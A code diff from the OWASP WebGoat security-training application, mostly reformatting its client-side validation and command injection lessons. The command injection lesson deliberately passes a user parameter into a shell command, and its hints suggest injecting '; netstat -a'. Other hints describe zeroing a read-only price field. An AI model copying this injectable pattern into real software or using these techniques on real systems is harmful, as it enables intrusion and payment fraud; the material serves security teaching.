+		String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
 
-		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-				.setWidth("90%").setAlign("center");
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
 
-		if (s.isColor()) {
+		if (s.isColor())
+		{
 			t.setBorder(1);
 		}
 
 		ec.addElement(new BR());
 
 		TR tr = new TR();
-		tr.addElement(new TD()
-				.addElement("Total before coupon is applied:"));
+		tr.addElement(new TD().addElement("Total before coupon is applied:"));
 
 		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "SUBTOT", s.getParser()
-						.getStringParameter("SUBTOT", "0")).setReadOnly(true))
-				.setAlign("right"));
+											new Input(Input.TEXT, "SUBTOT", s.getParser().getStringParameter("SUBTOT",
+																												"0"))
+													.setReadOnly(true)).setAlign("right"));
 		t.addElement(tr);
 
 		tr = new TR();
-		tr.addElement(new TD()
-				.addElement("Total to be charged to your credit card:"));
+		tr.addElement(new TD().addElement("Total to be charged to your credit card:"));
 
-		tr.addElement(new TD()
-				.addElement(
-						new Input(Input.TEXT, "GRANDTOT", s.getParser()
-								.getStringParameter("GRANDTOT", "0"))
-								.setReadOnly(true)).setAlign("right"));
+		tr.addElement(new TD().addElement(
+											new Input(Input.TEXT, "GRANDTOT", s.getParser()
+													.getStringParameter("GRANDTOT", "0")).setReadOnly(true))
+				.setAlign("right"));
 		t.addElement(tr);
 
 		t.addElement(tr);
@@ -201,8 +207,7 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 		t.addElement(tr);
 		tr = new TR();
 		tr.addElement(new TD().addElement("Enter your credit card number:"));
-		tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2",
-				param2)));
+		tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2)));
 		t.addElement(tr);
 		tr = new TR();
 		tr.addElement(new TD().addElement("Enter your coupon code:"));
@@ -222,7 +227,8 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 	}
 
-	protected int getTotalQty(WebSession s) {
+	protected int getTotalQty(WebSession s)
+	{
 
 		int quantity = 0;
 
@@ -234,36 +240,33 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 		return quantity;
 	}
 
-	protected ElementContainer createQtyTable(WebSession s) {
+	protected ElementContainer createQtyTable(WebSession s)
+	{
 
 		ElementContainer ec = new ElementContainer();
-		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1)
-				.setWidth("90%").setAlign("center");
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
 
-		if (s.isColor()) {
+		if (s.isColor())
+		{
 			t.setBorder(1);
 		}
 
 		TR tr = new TR();
-		tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now")
-				.setWidth("70%"));
+		tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("70%"));
 		tr.addElement(new TH().addElement("Price").setWidth("10%"));
 		tr.addElement(new TH().addElement("Quantity").setWidth("10%"));
 		tr.addElement(new TH().addElement("Total").setWidth("10%"));
 		t.addElement(tr);
 
 		tr = new TR();
-		tr
-				.addElement(new TD()
-						.addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
-
+		tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
 
 		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter(
-						"PRC1", "69.99")).setSize(10).setReadOnly(true)).setAlign("right"));
+											new Input(Input.TEXT, "PRC1", s.getParser().getStringParameter("PRC1",
+																											"69.99"))
+													.setSize(10).setReadOnly(true)).setAlign("right"));
 
-		Input input = new Input(Input.TEXT, "QTY1", s.getParser()
-				.getStringParameter("QTY1", "0"));
+		Input input = new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", "0"));
 
 		input.setOnKeyUp("updateTotals();");
 		input.setOnLoad("updateTotals();");
@@ -271,114 +274,102 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 		tr.addElement(new TD().addElement(input).setAlign("right"));
 
-		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter(
-						"TOT1", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+		tr.addElement(new TD()
+				.addElement(
+							new Input(Input.TEXT, "TOT1", s.getParser().getStringParameter("TOT1", "0")).setSize(10)
+									.setReadOnly(true)).setAlign("right"));
 
 		t.addElement(tr);
 		tr = new TR();
 		tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
 
 		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter(
-						"PRC2", "27.99")).setSize(10).setReadOnly(true)).setAlign("right"));
+											new Input(Input.TEXT, "PRC2", s.getParser().getStringParameter("PRC2",
+																											"27.99"))
+													.setSize(10).setReadOnly(true)).setAlign("right"));
 
-		input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter(
-				"QTY2", "0"));
+		input = new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", "0"));
 
 		input.setOnKeyUp("updateTotals();");
 		input.setSize(10);
 		tr.addElement(new TD().addElement(input).setAlign("right"));
 
-		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter(
-						"TOT2", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+		tr.addElement(new TD()
+				.addElement(
+							new Input(Input.TEXT, "TOT2", s.getParser().getStringParameter("TOT2", "0")).setSize(10)
+									.setReadOnly(true)).setAlign("right"));
 
 		t.addElement(tr);
 		tr = new TR();
-		tr
-				.addElement(new TD()
-						.addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
-
+		tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
 
 		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "PRC3", s.getParser().getStringParameter(
-						"PRC3", "1599.99")).setSize(10).setReadOnly(true))
-				.setAlign("right"));
+											new Input(Input.TEXT, "PRC3", s.getParser().getStringParameter("PRC3",
+																											"1599.99"))
+													.setSize(10).setReadOnly(true)).setAlign("right"));
 
-		input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter(
-				"QTY3", "0"));
+		input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "0"));
 
 		input.setOnKeyUp("updateTotals();");
 		input.setSize(10);
 		tr.addElement(new TD().addElement(input).setAlign("right"));
 
-
-		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter(
-						"TOT3", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+		tr.addElement(new TD()
+				.addElement(
+							new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter("TOT3", "0")).setSize(10)
+									.setReadOnly(true)).setAlign("right"));
 
 		t.addElement(tr);
 		tr = new TR();
-		tr
-				.addElement(new TD()
-						.addElement("3 - Year Performance Service Plan $1000 and Over "));
+		tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
 
+		tr.addElement(new TD().addElement(
+											new Input(Input.TEXT, "PRC4", s.getParser().getStringParameter("PRC4",
+																											"299.99"))
+													.setSize(10).setReadOnly(true)).setAlign("right"));
 
-		tr
-				.addElement(new TD().addElement(
-						new Input(Input.TEXT, "PRC4", s.getParser()
-								.getStringParameter("PRC4", "299.99")).setSize(10)
-								.setReadOnly(true)).setAlign("right"));
-
-		input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter(
-				"QTY4", "0"));
+		input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "0"));
 
 		input.setOnKeyUp("updateTotals();");
 		input.setSize(10);
 		tr.addElement(new TD().addElement(input).setAlign("right"));
 
-
-		tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter(
-						"TOT4", "0")).setSize(10).setReadOnly(true)).setAlign("right"));
+		tr.addElement(new TD()
+				.addElement(
+							new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter("TOT4", "0")).setSize(10)
+									.setReadOnly(true)).setAlign("right"));
 
 		t.addElement(tr);
 		ec.addElement(t);
 		return ec;
 	}
 
-		protected Category getDefaultCategory() {
+	protected Category getDefaultCategory()
+	{
 		return Category.AJAX_SECURITY;
 	}
 
 	/**
 	 * Gets the hints attribute of the AccessControlScreen object
-	 *
+	 * 
 	 * @return The hints value
 	 */
 
-
 	public List<String> getHints(WebSession s)
-	    {
+	{
 		List<String> hints = new ArrayList<String>();
 
-
-
-
 		hints.add("Use Firebug to examine the JavaScript.");
 
 		hints.add("Using Firebug, you can add breakpoints in the JavaScript.");
 
-		hints.add("Use Firebug to find the array of encrypted coupon codes, and " +
-				"step through the JavaScript to see the decrypted values.");
+		hints.add("Use Firebug to find the array of encrypted coupon codes, and "
+				+ "step through the JavaScript to see the decrypted values.");
 
 		hints.add("You can use Firebug to inspect (and modify) the HTML.");
 
-		hints.add("Use Firebug to remove the 'readonly' attribute from the input next to " +
-				"'The total charged to your credit card:' and set the value to 0.");
-
-
+		hints.add("Use Firebug to remove the 'readonly' attribute from the input next to "
+				+ "'The total charged to your credit card:' and set the value to 0.");
 
 		return hints;
 
@@ -386,16 +377,19 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 	/**
 	 * Gets the instructions attribute of the WeakAccessControl object
-	 *
+	 * 
 	 * @return The instructions value
 	 */
-	public String getInstructions(WebSession s) {
+	public String getInstructions(WebSession s)
+	{
 		String instructions = "";
 
-		if (getLessonTracker(s).getStage() == 1) {
+		if (getLessonTracker(s).getStage() == 1)
+		{
 			instructions = "STAGE 1:\tFor this exercise, your mission is to discover a coupon code to receive an unintended discount.";
 		}
-		else if (getLessonTracker(s).getStage() == 2) {
+		else if (getLessonTracker(s).getStage() == 2)
+		{
 			instructions = "STAGE 2:\tNow, try to get your entire order for free.";
 		}
 		return (instructions);
@@ -403,21 +397,23 @@ public class ClientSideValidation extends SequentialLessonAdapter {
 
 	private final static Integer DEFAULT_RANKING = new Integer(120);
 
-	protected Integer getDefaultRanking() {
+	protected Integer getDefaultRanking()
+	{
 		return DEFAULT_RANKING;
 	}
 
 	/**
 	 * Gets the title attribute of the AccessControlScreen object
-	 *
+	 * 
 	 * @return The title value
 	 */
-	public String getTitle() {
+	public String getTitle()
+	{
 		return "Insecure Client Storage";
 	}
 
 	public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java
index 0fd458fd7..fdc592aa3 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CommandInjection.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.File;
@@ -5,7 +6,6 @@ import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.List;
 import java.util.StringTokenizer;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -17,337 +17,297 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.Exec;
 import org.owasp.webgoat.util.ExecResults;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class CommandInjection extends LessonAdapter
 {
-    private final static String HELP_FILE = "HelpFile";
+	private final static String HELP_FILE = "HelpFile";
 
-    private String osName = System.getProperty("os.name");
+	private String osName = System.getProperty("os.name");
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    String helpFile = s.getParser().getRawParameter(HELP_FILE,
-		    "BasicAuthentication.help");
-	    if (getWebgoatContext().isDefuseOSCommands()
-		    && (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1))
-	    {
-		int index = helpFile.indexOf('&');
-		if (index == -1)
+		ElementContainer ec = new ElementContainer();
+		boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
+		try
 		{
-		    index = helpFile.indexOf(';');
-		}
-		index = index + 1;
-		int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote
-		System.out.println("Command = ["
-			+ helpFile.substring(index, helpFileLen).trim()
-				.toLowerCase() + "]");
-		if ((osName.indexOf("Windows") != -1 && (helpFile.substring(
-			index, helpFileLen).trim().toLowerCase().equals(
-			"netstat -a")
-			|| helpFile.substring(index, helpFileLen).trim()
-				.toLowerCase().equals("dir")
-			|| helpFile.substring(index, helpFileLen).trim()
-				.toLowerCase().equals("ls")
-			|| helpFile.substring(index, helpFileLen).trim()
-				.toLowerCase().equals("ifconfig") || helpFile
-			.substring(index, helpFileLen).trim().toLowerCase()
-			.equals("ipconfig")))
-			|| (helpFile.substring(index, helpFileLen).trim()
-				.toLowerCase().equals("netstat -a #")
-				|| helpFile.substring(index, helpFileLen)
-					.trim().toLowerCase().equals("dir #")
-				|| helpFile.substring(index, helpFileLen)
-					.trim().toLowerCase().equals("ls #")
-				|| helpFile.substring(index, helpFileLen)
-					.trim().toLowerCase().equals("ls -l #")
-				|| helpFile.substring(index, helpFileLen)
-					.trim().toLowerCase().equals(
-						"ifconfig #") || helpFile
-				.substring(index, helpFileLen).trim()
-				.toLowerCase().equals("ipconfig #")))
-		{
-		    illegalCommand = false;
-		}
-		else
-		{
-		    s
-			    .setMessage("It appears that you are on the right track.  "
-				    + "Commands that may compromise the operating system have been disabled.  "
-				    + "The following commands are allowed: netstat -a, dir, ls, ifconfig, and ipconfig");
-		}
-	    }
+			String helpFile = s.getParser().getRawParameter(HELP_FILE, "BasicAuthentication.help");
+			if (getWebgoatContext().isDefuseOSCommands()
+					&& (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1))
+			{
+				int index = helpFile.indexOf('&');
+				if (index == -1)
+				{
+					index = helpFile.indexOf(';');
+				}
+				index = index + 1;
+				int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote
+				System.out.println("Command = [" + helpFile.substring(index, helpFileLen).trim().toLowerCase() + "]");
+				if ((osName.indexOf("Windows") != -1 && (helpFile.substring(index, helpFileLen).trim().toLowerCase()
+						.equals("netstat -a")
+						|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir")
+						|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls")
+						|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig") || helpFile
+						.substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig")))
+						|| (helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("netstat -a #")
+								|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir #")
+								|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls #")
+								|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls -l #")
+								|| helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig #") || helpFile
+								.substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig #")))
+				{
+					illegalCommand = false;
+				}
+				else
+				{
+					s.setMessage("It appears that you are on the right track.  "
+							+ "Commands that may compromise the operating system have been disabled.  "
+							+ "The following commands are allowed: netstat -a, dir, ls, ifconfig, and ipconfig");
+				}
+			}
 
-	    if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1
-		    && helpFile.indexOf(';') == -1)
-	    {
-		if (helpFile.length() > 0)
-		{
-		    if (upDirCount(helpFile) <= 3)
-		    {
-			// FIXME: This value isn't used.  What is the goal here?
-			s.getContext().getRealPath("/");
-			illegalCommand = false;
-		    }
-		    else
-		    {
-			s
-				.setMessage("It appears that you are on the right track.  "
-					+ "Commands that may compromise the operating system have been disabled.  "
-					+ "This lesson is a command injection lesson, not access control.");
-		    }
-		}
-		else
-		{
-		    // No Command entered.
-		    illegalCommand = false;
-		}
-	    }
-	    File safeDir = new File(s.getContext().getRealPath("/lesson_plans"));
+			if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1 && helpFile.indexOf(';') == -1)
+			{
+				if (helpFile.length() > 0)
+				{
+					if (upDirCount(helpFile) <= 3)
+					{
+						// FIXME: This value isn't used. What is the goal here?
+						s.getContext().getRealPath("/");
+						illegalCommand = false;
+					}
+					else
+					{
+						s.setMessage("It appears that you are on the right track.  "
+								+ "Commands that may compromise the operating system have been disabled.  "
+								+ "This lesson is a command injection lesson, not access control.");
+					}
+				}
+				else
+				{
+					// No Command entered.
+					illegalCommand = false;
+				}
+			}
+			File safeDir = new File(s.getContext().getRealPath("/lesson_plans"));
 
-	    ec
-		    .addElement(new StringElement(
-			    "You are currently viewing: <b>"
-				    + (helpFile.toString().length() == 0 ? "&lt;select file from list below&gt;"
-					    : helpFile.toString()) + "</b>"));
+			ec.addElement(new StringElement("You are currently viewing: <b>"
+					+ (helpFile.toString().length() == 0 ? "&lt;select file from list below&gt;" : helpFile.toString())
+					+ "</b>"));
 
-	    if (!illegalCommand)
-	    {
-		String results;
-		String fileData = null;
-		helpFile = helpFile.replaceAll("\\.help", "\\.html");
+			if (!illegalCommand)
+			{
+				String results;
+				String fileData = null;
+				helpFile = helpFile.replaceAll("\\.help", "\\.html");
 
-		if (osName.indexOf("Windows") != -1)
+				if (osName.indexOf("Windows") != -1)
+				{
+					// Add quotes around the filename to avoid having special characters in DOS
+					// filenames
+					results = exec(s, "cmd.exe /c dir /b \"" + safeDir.getPath() + "\"");
+					fileData = exec(s, "cmd.exe /c type \"" + new File(safeDir, helpFile).getPath() + "\"");
+
+				}
+				else
+				{
+					String[] cmd1 = { "/bin/sh", "-c", "ls \"" + safeDir.getPath() + "\"" };
+					results = exec(s, cmd1);
+					String[] cmd2 = { "/bin/sh", "-c", "cat \"" + new File(safeDir, helpFile).getPath() + "\"" };
+					fileData = exec(s, cmd2);
+				}
+
+				ec.addElement(new P().addElement("Select the lesson plan to view: "));
+				ec.addElement(ECSFactory.makePulldown(HELP_FILE, parseResults(results.replaceAll("(?s)\\.html",
+																									"\\.help"))));
+				// ec.addElement( results );
+				Element b = ECSFactory.makeButton("View");
+				ec.addElement(b);
+				// Strip out some of the extra html from the "help" file
+				ec.addElement(new BR());
+				ec.addElement(new BR());
+				ec.addElement(new HR().setWidth("90%"));
+				ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "<br>")
+						.replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
+						.replaceAll("<br>\\s<br>", "<br>")));
+
+			}
+		} catch (Exception e)
 		{
-		    // Add quotes around the filename to avoid having special characters in DOS filenames
-		    results = exec(s, "cmd.exe /c dir /b \""
-			    + safeDir.getPath() + "\"");
-		    fileData = exec(s, "cmd.exe /c type \""
-			    + new File(safeDir, helpFile).getPath() + "\"");
-
-		}
-		else
-		{
-		    String[] cmd1 = { "/bin/sh", "-c",
-			    "ls \"" + safeDir.getPath() + "\"" };
-		    results = exec(s, cmd1);
-		    String[] cmd2 = {
-			    "/bin/sh",
-			    "-c",
-			    "cat \"" + new File(safeDir, helpFile).getPath()
-				    + "\"" };
-		    fileData = exec(s, cmd2);
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
 
-		ec.addElement(new P()
-			.addElement("Select the lesson plan to view: "));
-		ec.addElement(ECSFactory.makePulldown(HELP_FILE,
-			parseResults(results.replaceAll("(?s)\\.html",
-				"\\.help"))));
-		//ec.addElement( results );
-		Element b = ECSFactory.makeButton("View");
-		ec.addElement(b);
-		// Strip out some of the extra html from the "help" file
-		ec.addElement(new BR());
-		ec.addElement(new BR());
-		ec.addElement(new HR().setWidth("90%"));
-		ec.addElement(new StringElement(fileData.replaceAll(
-			System.getProperty("line.separator"), "<br>")
-			.replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll(
-				"<br><br>", "<br>").replaceAll("<br>\\s<br>",
-				"<br>")));
-
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return (ec);
 	}
 
-	return (ec);
-    }
-
-
-    private String parseResults(String results)
-    {
-    	results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "");
-    	StringTokenizer st = new StringTokenizer(results, "\n");
-    	StringBuffer modified = new StringBuffer();
-    	
-    	while(st.hasMoreTokens())
-    	{
-    		String s = (String)st.nextToken().trim();
-    		
-    		if(s.length() > 0 && s.endsWith(".help"))
-    		{
-    			modified.append(s + "\n");
-    		}
-    	}
-    	
-    	return modified.toString();
-    }
-
-
-    public static int upDirCount(String fileName)
-    {
-	int count = 0;
-	// check for "." = %2d  
-	// we wouldn't want anyone bypassing the check by useing encoding :)
-	// FIXME: I don't think hex endoing will work here.
-	fileName = fileName.replaceAll("%2d", ".");
-	int startIndex = fileName.indexOf("..");
-	while (startIndex != -1)
+	private String parseResults(String results)
 	{
-	    count++;
-	    startIndex = fileName.indexOf("..", startIndex + 1);
-	}
-	return count;
-    }
+		results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "");
+		StringTokenizer st = new StringTokenizer(results, "\n");
+		StringBuffer modified = new StringBuffer();
 
+		while (st.hasMoreTokens())
+		{
+			String s = (String) st.nextToken().trim();
 
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @param  s        Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    private String exec(WebSession s, String command)
-    {
-	System.out.println("Executing OS command: " + command);
-	ExecResults er = Exec.execSimple(command);
-	if ((command.indexOf("&") != -1 || command.indexOf(";") != -1)
-		&& !er.getError())
-	{
-	    makeSuccess(s);
+			if (s.length() > 0 && s.endsWith(".help"))
+			{
+				modified.append(s + "\n");
+			}
+		}
+
+		return modified.toString();
 	}
 
-	return (er.toString());
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  command  Description of the Parameter
-     * @param  s        Description of the Parameter
-     * @return          Description of the Return Value
-     */
-    private String exec(WebSession s, String[] command)
-    {
-	System.out.println("Executing OS command: " + Arrays.asList(command));
-	ExecResults er = Exec.execSimple(command);
-	if (!er.getError())
+	public static int upDirCount(String fileName)
 	{
-	    makeSuccess(s);
+		int count = 0;
+		// check for "." = %2d
+		// we wouldn't want anyone bypassing the check by useing encoding :)
+		// FIXME: I don't think hex endoing will work here.
+		fileName = fileName.replaceAll("%2d", ".");
+		int startIndex = fileName.indexOf("..");
+		while (startIndex != -1)
+		{
+			count++;
+			startIndex = fileName.indexOf("..", startIndex + 1);
+		}
+		return count;
 	}
 
-	return (er.toString());
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private String exec(WebSession s, String command)
+	{
+		System.out.println("Executing OS command: " + command);
+		ExecResults er = Exec.execSimple(command);
+		if ((command.indexOf("&") != -1 || command.indexOf(";") != -1) && !er.getError())
+		{
+			makeSuccess(s);
+		}
 
-    /**
-     *  Gets the category attribute of the CommandInjection object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
+		return (er.toString());
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param command
+	 *            Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private String exec(WebSession s, String[] command)
+	{
+		System.out.println("Executing OS command: " + Arrays.asList(command));
+		ExecResults er = Exec.execSimple(command);
+		if (!er.getError())
+		{
+			makeSuccess(s);
+		}
 
-    /**
-     *  Gets the hints attribute of the DirectoryScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("The application is using a system command to return the contents of a file.");
-	hints
-		.add("The ampersand(&) separates commands in the Windows 2000 command shell. In Unix the separator is typically a semi-colon(;)");
-	hints
-		.add("Use a proxy to insert & netstat -a on Windows or ;netstat -a on Unix.");
-	hints
-		.add("Note that the server may enclose the submitted file name within quotes");
+		return (er.toString());
+	}
 
-	return hints;
-    }
+	/**
+	 * Gets the category attribute of the CommandInjection object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.INJECTION;
+	}
 
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("The application is using a system command to return the contents of a file.");
+		hints
+				.add("The ampersand(&) separates commands in the Windows 2000 command shell. In Unix the separator is typically a semi-colon(;)");
+		hints.add("Use a proxy to insert & netstat -a on Windows or ;netstat -a on Unix.");
+		hints.add("Note that the server may enclose the submitted file name within quotes");
 
-    /**
-     *  Gets the instructions attribute of the ParameterInjection object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "Choose the lesson plan you would like to view.  "
-		+ "Try to inject a command to the operating system.";
+		return hints;
+	}
 
-	return (instructions);
-    }
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "Choose the lesson plan you would like to view.  "
+				+ "Try to inject a command to the operating system.";
 
-    private final static Integer DEFAULT_RANKING = new Integer(40);
+		return (instructions);
+	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(40);
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-
-    /**
-     *  Gets the title attribute of the DirectoryScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "Command Injection";
-    }
+	/**
+	 * Gets the title attribute of the DirectoryScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "Command Injection";
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java
index 8184975f9..119741496 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.text.NumberFormat;
@@ -5,7 +6,6 @@ import java.util.ArrayList;
 import java.util.List;
 import java.util.Locale;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -24,587 +24,603 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
